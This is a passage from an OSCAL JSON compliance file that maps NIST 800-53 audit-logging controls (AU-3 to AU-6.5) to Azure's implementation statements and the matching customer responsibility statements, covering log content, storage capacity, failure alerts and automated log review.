review."}],"responsibilities":[{"uuid":"e290fc10-105b-4670-bc37-6d215a12ace0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-010"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing and updating the event types selected for logging on customer-deployed resources at least annually.","provided-uuid":"89a26c9e-b41c-4964-96aa-46ff0415e4cd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bc5d479d-6201-4f6c-8224-5c56cd4a155f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-3","statements":[{"uuid":"047df933-cdbf-4151-9dbb-bc8b8a6a8c02","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-3_smt","by-components":[{"uuid":"22112463-dfd4-43e7-9318-94a916c36844","export":{"provided":[{"uuid":"f404b55e-9f9c-4347-a7fa-8e3d402559c2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-011"}],"description":"Azure utilizes auditing configurations that ensure the auditable event metadata contains at a minimum what type of event occurred, when the event occurred, where the event occurred, the source of the event, the outcome of the event, and the identifiers associated with the event. Exactly how this is captured varies for each asset, but the Azure configuration baselines for servers, network devices, and services include the minimum requirements specified above._x000D_ _x000D_"}],"responsibilities":[{"uuid":"340680e4-b40b-468c-bae2-70138067aa65","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-011"}],"description":"The customer is responsible for configuring Azure auditing capabilities on customer-deployed resources to generate audit records containing the following: what type of event occurred, when the event occurred, where the event occurred, the source of the event, the outcome of the event, and the identity of any subjects associated with the event.","provided-uuid":"f404b55e-9f9c-4347-a7fa-8e3d402559c2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"436908f2-fe72-45ec-b341-e1179755c342","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-3.1","statements":[{"uuid":"beebf980-8ed6-4a28-8e56-dce1f889aef1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-012"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"au-3.1_smt","by-components":[{"uuid":"9a84d886-3ce6-41b4-a2e7-9a8402ee6d74","export":{"provided":[{"uuid":"33cc5667-5a01-4344-a94c-c2ca6b13d26d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-012"}],"description":"Azure collects audit record content including the additional content required. This content includes informational messages to diagnose or identify events, characteristics that describe or identify the object or resource being acted upon, and the number of bytes received, and bytes sent, all of which vary by event type and asset. The session, connection, transaction, or activity duration can be obtained by analyzing the audit records collected; events related to sessions, connections and transactions contain timestamps which can be analyzed to determine duration._x000D_ _x000D_"}],"responsibilities":[{"uuid":"5deb98df-c60d-4444-99d9-64c0cd2af1d2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-012"}],"description":"The customer is responsible for configuring Azure auditing capabilities on customer-deployed resources to ensure organizational audit record content requirements are implemented.","provided-uuid":"33cc5667-5a01-4344-a94c-c2ca6b13d26d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a0e70b24-8efc-452d-9f64-2a3f1938803b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-4","statements":[{"uuid":"4673eab8-9724-47db-8921-2d57b09be7b9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-4_smt","by-components":[{"uuid":"1cd02a5a-d312-46bb-971f-34c49c10b980","export":{"provided":[{"uuid":"256a1092-be59-483d-a48f-d592fdb88f68","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-013"}],"description":"Audit records for each Azure service are captured by the Geneva Monitoring Agent (MA) and retained in a service-specific Azure storage account. The MA collects data from the service assets and automatically uploads to the service storage account. Each storage account is allocated sufficient storage capacity for the retention of at least ninety (90) days' worth of logs online and is monitored for usage by the service teams. If a storage account is near capacity, either - service teams are notified by Azure Storage automatically and the service teams creates an additional storage account or expand the current account's capacity; or, if the service team has configured Azure Storage for auto-expansion, the storage is increased as needed. Each service team is responsible for its own log capacity planning. If the service team does not expand capacity for any reason, due to the high volume of events received, Azure audit collection settings are to overwrite when capacity is exceeded. The MA then sends the collected logs from the service-specific storage into a central log storage cluster known as the parsing engine. This local cluster stores centrally aggregated log data for the purposes of standardizing the ingested log data, such as time, date, field titles, etc., and parsing the data for alerting via multiple microservices. The logs do not reside on these servers long-term; once parsed, logs are provided to Kusto and Jarvis. Kusto and Jarvis then retain the parsed data as read-only, ensuring the integrity of the centralized logs, automatically growing the backend data storage. There is no hard limit associated with the central storage. Azure currently defines baseline requirements for local security audit log storage capacity to a window of at least ten (10) minutes of events on even Azure's most active hosts. Events are continuously sent to Geneva Monitoring, which has adequate storage capacity to handle the volume of events captured due to auto-expansion. In the event of an audit failure or audit storage capacity being reached, Azure monitoring tools generate near-real time alerts to the C+AI Security Engineering team, who are assigned to address the processing failure."}],"responsibilities":[{"uuid":"f5ef1a82-aa82-4a43-ab32-417aad2510e4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-013"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for allocating audit log storage capacity for customer-deployed resources. Additionally, the customer should consider the retention period defined in AU-11 when allocating storage capacity for audit","provided-uuid":"256a1092-be59-483d-a48f-d592fdb88f68"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ae005091-3810-445e-813c-3ea6b676e73a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-5","statements":[{"uuid":"38cec9f4-5fc5-4b6b-b89d-d052b2f0ccdb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-014"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-5_smt.a","by-components":[{"uuid":"35b9a73f-029d-41bd-9bac-ca04fd7b6b49","export":{"provided":[{"uuid":"ac670dc7-37cb-4a44-b2a1-9b253ef14b28","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-014"}],"description":"The Geneva Monitoring Agent (MA) is responsible for capturing log events and storing them in storage accounts specific to each service team. Incident Management (IcM) is an automated mechanism for scanning log storage and raising alerts when specific predefined criteria is met. IcM generates email notifications and creates a corresponding IcM ticket for action. IcM actively monitors Azure based on the filters and the thresholds identified within the rules defined by the Azure Security team and respective service teams. Key alerts include, but are not limited to, if AzSecPack is not installed, if audit data is not being received, and if the data decreases by a specific percentage, indicating an audit logging failure somewhere in the log pipeline. All alerts follow the incident management procedures, which include analysis to determine whether further action is necessary by either the service team or Security Response Team."}],"responsibilities":[{"uuid":"d4032a85-3e60-4e71-b166-3e7acc73cf8a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-014"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for providing alerts in response to audit processing failures (e.g., storage quota is reached, audit hardware/software errors) of customer-deployed resources.","provided-uuid":"ac670dc7-37cb-4a44-b2a1-9b253ef14b28"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a82f4107-8083-4c9d-adea-4580fe61fbb8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-015"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-5_smt.b","by-components":[{"uuid":"09f801b8-4c55-4800-90d4-19bc32d40db3","export":{"provided":[{"uuid":"7cac45e7-355d-442a-bd60-34b71a9a351e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-015"}],"description":"In the event of an audit failure or audit storage capacity being reached, monitoring tools alert the C+AI Security Engineering team in near real time, who are assigned to address the processing failure. Alerts for audit processing failures are investigated immediately following the incident management process and appropriate actions are taken in accordance with the incident management process. In addition, if the failure is that the storage repository is full, Azure is configured to overwrite the oldest data to preserve the most recent information for after-the-fact investigations."}],"responsibilities":[{"uuid":"3c53a536-79fa-460b-8478-9236224a24d0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-015"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for taking action when audit processing failures occur for customer-deployed resources.","provided-uuid":"7cac45e7-355d-442a-bd60-34b71a9a351e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"31bf8be1-203e-4e60-b648-2f2b013248d0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-5.1","statements":[{"uuid":"b6d9231f-9e8b-40f3-a16c-83f6b31d9812","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-016"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-5.1_smt","by-components":[{"uuid":"47e7824b-57ed-483c-879a-e782fb222d26","export":{"provided":[{"uuid":"f1816823-28d4-461e-bbbd-83be043222dd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-016"}],"description":"Most services use Azure Storage auto-expansion for service team storage of logs. When the storage account reaches a specific threshold of 90%, Azure Storage automatically provisions additional space. For services who have not transitioned to auto-expansion, automated messages are sent out in near-real time, alerting service teams whenever a pre-determined threshold of 80% and 95% of storage capacity is crossed. If the storage repository is full because a service team was unable to resolve the alert in time, Azure is configured to overwrite the oldest data to preserve the most recent information for after-the-fact investigations._x000D_ _x000D_"}],"responsibilities":[{"uuid":"1201a54c-0390-4430-b721-c3a439f2ce6f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-016"}],"description":"The customer is responsible for configuring an audit record storage capacity warning for customer-deployed resources including the percentage of storage capacity at which a warning is required; the time period within which the warning must occur; and the personnel, roles, and/or locations to be notified.","provided-uuid":"f1816823-28d4-461e-bbbd-83be043222dd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1708700a-e4ed-464f-907b-c0ee311e2e4d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-5.2","statements":[{"uuid":"533cabee-9d40-4bf3-a655-bd1ffc47199a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-017"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-5.2_smt","by-components":[{"uuid":"50b26d21-f1e6-4ac5-82f4-62c5dbc9db49","export":{"provided":[{"uuid":"9a119c8a-bcba-409a-bfa2-6e67f627bff6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-017"}],"description":"The Geneva Monitoring Agent (MA) is responsible for capturing log events and storing them in storage accounts specific to each service team. Incident Management (IcM) is an automated mechanism for scanning log storage and raising alerts when specific predefined criteria is met. IcM generates email notifications and creates a corresponding IcM ticket for action. IcM actively monitors Azure based on the filters and the thresholds identified within the rules defined by the Azure Security team and respective service teams. Key alerts include, but are not limited to, if AzSecPack is not installed, if audit data is not being received, and if the data decreases by a specific percentage, indicating an audit logging failure somewhere in the log pipeline. All alerts follow the incident management procedures, which include analysis to determine whether further action is necessary by either the service team or Security Response Team._x000D_ _x000D_"}],"responsibilities":[{"uuid":"f3ccacef-1a7b-4621-a005-81d3e30dd7f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-017"}],"description":"The customer is responsible for providing real-time alerts for audit event failures for customer-deployed resources.","provided-uuid":"9a119c8a-bcba-409a-bfa2-6e67f627bff6"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"4d9ba720-7a11-45d9-8d04-4bec78531dbb","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-6","statements":[{"uuid":"3cf8bedc-cd94-4405-900d-d0b5654b3687","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-018"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-6_smt.a","by-components":[{"uuid":"46ba4766-e32a-45aa-bdbf-4c3de85b2d5b","export":{"provided":[{"uuid":"e9dc6207-35e8-4aea-a8ba-72509e50d15d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-018"}],"description":"Due to the size and complexity of the Azure environment, Azure utilizes log event forwarding tools to record events across all Azure assets and utilizes monitoring tools to automatically correlate and analyze the events gathered by each logging tool. Log reviews cannot be conducted manually in the Azure environment due to the high volume of events. Instead, Azure implements automated methods to perform review, analysis, and reporting of logs. Azure implements tooling such as Azure Security Monitoring (ASM) and SCUBA to directly alert the appropriate personnel of security-relevant events in a variety of ways, including Service 360 (S360) notifications, Incident Management (IcM) tickets, and work items. These tools utilize audit policies and detections that report events to the Microsoft Operations Center (MOC), Security Response Team, and service teams as appropriate. The policies are tuned to alert on events of immediate concern. There are multiple detection authoring teams across Azure. This includes data scientists working on Microsoft Defender for Cloud and the Microsoft Threat Intelligence Center (MSTIC) who write detections for both external customer use via ASC and enable coverage of applicable detections for internal Azure services via the logging and monitoring pipeline. Examples of the detections are documented in the help topic for ASC detection capabilities at the link below. <https://docs.microsoft.com/en-us/azure/security-center/security-center-detection-capabilities> This includes integrated threat intelligence which looks for known bad actors by leveraging global threat intelligence from Microsoft products and services, the Microsoft Digital Crimes Unit (DCU), the Microsoft Security Response Center (MSRC), and external feeds, behavioral analytics, which applies known patterns to discover malicious behavior, and anomaly detection, which uses statistical profiling to build a historical baseline and alerts on deviations from established baselines that conform to a potential attack vector. Example of detections running for internal Azure services include suspicious process execution, malicious PowerShell scripts, lateral movement and internal reconnaissance, and hidden virus, malware, and exploitation attempts. These detections are routed to MSRC for triage and investigation. The ASM team has atomic near-real-time monitors for unexpected asset access, virus and malware, and audit processing failures such as clearing the security event log and system time changes. The alerts are auto routed to services for review, except for identified high value assets (HVA) where the alerts are centrally triaged by the Security Response Team. Once the raw logs are automatically correlated and processed, the appropriate teams review and analyze alerts generated by the detections and automated review of audit records in real time, customer request or escalation, or any other functionality impacting the alert in production. Groups of these correlated events that meet a pattern of a known attack methodology are collected and delivered to appropriate personnel via IcM, email, or work item. Personnel correlate alerts and append them to tickets for review and analysis, and if necessary for future authoring and refinement of new or existing detections. The alerting system provides a response capability twenty-four (24) hours a day, seven (7) days a week. Troubleshooting Guides (TSGs) applied to work tickets provide instructions for the escalation of certain events to response personnel."}],"responsibilities":[{"uuid":"97883d76-bdec-4cbd-a252-52206d8d177c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-018"}],"description":"The customer is responsible for reviewing and analyzing audit records of customer-deployed resources to identify inappropriate or unusual activity and the potential impact.","provided-uuid":"e9dc6207-35e8-4aea-a8ba-72509e50d15d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b9437026-99b1-456a-8599-a5e1b73a7d30","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-019"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-6_smt.b","by-components":[{"uuid":"12b7e7aa-97ef-4597-94c8-d7e4e776b7e8","export":{"provided":[{"uuid":"8183f1bb-2150-48b2-9fd7-325a6fe0af0c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-019"}],"description":"Azure configures the detections and resulting alerts to be sent to the appropriate parties for resolution. Depending on the alert, this can include the service team or the Security Response Team. For example, use of Break-Glass account generates an alert to the service team owning the subscription in which Break-Glass account access was utilized. Alternatively, malicious PowerShell scripts are routed to the Security Response Team. Regardless of which team the alert is routed to, all service teams, Azure personnel, and external customers can escalate an incident or report a new one."}],"responsibilities":[{"uuid":"076412d0-2d3f-4b0c-953f-ae9ac4117407","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-019"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reporting findings of inappropriate or unusual activity (defined in AU-06.a) on customer-deployed resources.","provided-uuid":"8183f1bb-2150-48b2-9fd7-325a6fe0af0c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"82baf9d6-6f0e-416d-b62e-72adb80b9399","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-6_smt.c","by-components":[{"uuid":"bad738c6-bc7b-464f-94a8-78bda73b1e7a","export":{"provided":[{"uuid":"d210657b-582a-45f1-8566-ea0b8f0b47f9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-020"}],"description":"Azure Security receives alerts from vendor websites, other third-party services such as Internet Security Systems, US-CERT advisories and alerts, and Microsoft-published bulletins and adjusts the level of auditing in two ways - first, Azure notifies Azure service teams if a change in the level of monitoring is necessary due to indications of increased risk, and service teams adjust monitoring accordingly. Second, Azure tailors detections to look for specific threats based on the nature of the risk to Azure operations and assets. When circumstances dictate a review of the auditing procedures, such as a change in risk level based on law enforcement information, intelligence information, or other credible sources of information as provided, the C+AI Security team may make the decision to modify the audit procedures, including stakeholders from the Security Response Team, Security Governance Platform, Compliance, Risk, Architecture, Threat, and Strategy, Security Architecture, and Security Engineering. C+AI Security may also make updates whenever a change occurs in the threat environment as defined by authoritative sources."}],"responsibilities":[{"uuid":"be7aef76-3bf8-461d-8f21-9f30ba2c22a1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-020"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for adjusting the level of audit review, analysis, and reporting for customer-deployed resources when there is a change in risk based on information provided by law enforcement, intelligence, or other credible sources.","provided-uuid":"d210657b-582a-45f1-8566-ea0b8f0b47f9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a40c5461-2636-4131-9770-6bf868c8f1ff","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-6.1","statements":[{"uuid":"4f68f8e6-7142-45e9-ae87-1481870fb099","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-6.1_smt","by-components":[{"uuid":"2bd352cd-93be-49d5-b21c-1485bf1b5dde","export":{"provided":[{"uuid":"d904569b-7124-403d-a528-cb473a0e7ae3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-021"}],"description":"Audit review, analysis, and reporting processes are automated using Geneva Monitoring, Azure Security Monitoring (ASM), SCUBA, and other tools. ASM and SCUBA analyze event distribution to identify spikes in event traffic and aggregate analysis such as anomaly detection, filtering and whitelisting rules, specific event alert triggers, and more. ASM can generate summary reports using predefined queries. Geneva Monitoring applies correlation logic and intelligence to the audit log events. All detection systems can generate alerts automatically._x000D_ _x000D_"}],"responsibilities":[{"uuid":"fac8099b-e809-45b7-b4a8-9d665d6b2709","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-021"}],"description":"The customer is responsible for automating the audit review, analysis, and reporting of suspicious activities within customer-deployed resources.","provided-uuid":"d904569b-7124-403d-a528-cb473a0e7ae3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d7997be3-60df-4573-9f7c-56222272bd39","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-6.3","statements":[{"uuid":"f33bd72f-81c2-453c-a391-28c63b941ce2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-022"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-6.3_smt","by-components":[{"uuid":"e3285014-c8c6-4929-861d-04492bcf9424","export":{"provided":[{"uuid":"b88561fd-0667-4f7f-bf91-a46bb3f4a932","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-022"}],"description":"Due to the size and complexity of the Azure environment, Azure utilizes log event forwarding tools to record events across all Azure assets and utilizes monitoring tools to automatically correlate and analyze the events gathered by each logging tool. Log reviews cannot be conducted manually in the Azure environment due to the high volume of events. Instead, Azure implements automated methods to perform review, analysis, and reporting of logs._x000D_ _x000D_ Azure implements tooling such as Azure Security Monitoring (ASM) and SCUBA to directly alert the appropriate personnel of security-relevant events in a variety of ways, including Service 360 (S360) notifications, Incident Management (IcM) tickets, and work items. These tools utilize audit policies and detections that report events to the Microsoft Operations Center (MOC), Security Response Team, and service teams as appropriate. The policies are tuned to alert on events of immediate concern._x000D_ _x000D_"}],"responsibilities":[{"uuid":"3ed0f143-5141-4148-960a-da9d6d079783","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-022"}],"description":"The customer is responsible for analyzing and correlating audit records (defined in AU-06) across customer-deployed repositories.","provided-uuid":"b88561fd-0667-4f7f-bf91-a46bb3f4a932"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"53d73d1b-17c3-4e30-8cf7-ef85408dd8f3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-6.4","statements":[{"uuid":"5d861da4-07b7-43d0-9148-f32bc1e1917e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-023"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-6.4_smt","by-components":[{"uuid":"a5c83bfa-4d87-437c-bb40-8cabc884be28","export":{"provided":[{"uuid":"e0a8f9d6-9b20-4237-8392-b276e17e0cff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-023"}],"description":"Due to the size and complexity of the Azure environment, Azure utilizes log event forwarding tools to record events across all Azure assets and utilizes monitoring tools to automatically correlate and analyze the events gathered by each logging tool. Log reviews cannot be conducted manually in the Azure environment due to the high volume of events. Instead, Azure implements automated methods to perform review, analysis, and reporting of logs._x000D_ _x000D_ Azure implements tooling such as Azure Security Monitoring (ASM) and SCUBA to directly alert the appropriate personnel of security-relevant events in a variety of ways, including Service 360 (S360) notifications, Incident Management (IcM) tickets, and work items. These tools utilize audit policies and detections that report events to the Microsoft Operations Center (MOC), Security Response Team, and service teams as appropriate. The policies are tuned to alert on events of immediate concern._x000D_ _x000D_"}],"responsibilities":[{"uuid":"7e50ad91-d77f-4bd4-9661-7f5ed92a865c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-023"}],"description":"The customer is responsible for providing the capability to centrally review and analyze audit records collected from customer-deployed resources.","provided-uuid":"e0a8f9d6-9b20-4237-8392-b276e17e0cff"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5ad87ffd-8591-4409-9892-aaf3c3565dcd","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-6.5","statements":[{"uuid":"8877fb6a-d2f5-491c-8a5c-46984c2bfbf3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-024"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-6.5_smt","by-components":[{"uuid":"b47a22f8-9b46-4ed4-a44d-f48a3992cc77","export":{"provided":[{"uuid":"f2dbabce-7d26-4736-9a65-f96a53cedd52","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-024"}],"description":"Azure correlates vulnerability scanning information with internal and external penetration test results and audit records to gain a more complete picture of potential exploits and to enhance the ability to detect inappropriate activity, should it occur. Additionally, Azure uses vulnerability scanning reports in conjunction with performance and system monitoring data to identify unusual activity. Azure combines the use of various sources of intelligence to aid incident investigation on an as-needed basis, including the use of audit logging data, incident response reports, vulnerability scan data, and penetration testing results. The correlation of this information is part of the identification phase of the incident management process and aids in discovering the presence of inappropriate activity in the Azure environment._x000D_ _x000D_"}],"responsibilities":[{"uuid":"268ec97a-849b-4dd8-be7e-daca7423e091","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-024"}],"description":"The customer is responsible for integrating audit record analysis with analysis of data/information collected from other sources to further identify suspicious activity within 